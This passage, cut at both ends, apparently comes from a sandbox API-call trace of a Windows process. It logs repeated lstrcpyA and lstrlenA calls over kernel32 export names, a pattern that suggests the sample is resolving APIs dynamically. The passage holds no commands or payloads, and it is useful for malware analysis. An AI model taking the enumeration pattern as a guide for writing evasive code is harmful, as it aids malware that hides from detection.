lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.236] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.236] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.236] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.236] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.236] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.236] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.236] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.236] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.236] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.236] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.236] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.236] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.236] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.236] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.236] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.236] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.237] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.237] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.237] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.237] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.237] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.237] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.237] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.237] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.237] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.237] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.237] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.237] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.237] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.237] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.237] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.237] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.237] lstrlenA (lpString="BEEP") returned 4 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.237] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.237] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.238] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.238] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.238] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.238] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.238] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.238] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.238] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.238] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.238] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.238] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.238] lstrlenA (lpString="CANCELIO") returned 8 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.238] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.238] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.238] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.238] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.238] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.238] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.238] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.238] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.239] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.239] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.239] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.239] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.239] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.239] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.239] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.239] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.239] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.239] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.239] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.239] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.239] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.239] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.239] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.239] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.239] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.239] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.239] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.240] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.240] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.240] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.240] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.240] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.240] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.240] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.240] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.240] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.240] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.240] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.240] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.240] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.240] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.240] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.240] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.240] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.240] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.241] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.241] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.241] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.241] lstrlenA (lpString="COPYFILEA") returned 9 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.241] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.241] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.241] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.241] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.241] lstrlenA (lpString="COPYFILEW") returned 9 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.241] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.241] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.241] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.241] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.241] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.241] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.241] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.241] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.241] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.241] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.242] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.242] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.242] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.242] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.242] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.242] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.242] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.242] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.242] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.242] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.242] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.242] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.242] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.242] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.242] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.242] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.242] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.242] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.242] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.243] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.243] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.243] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.243] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.243] lstrcpyA (in: lpString1=0x3f2d468, 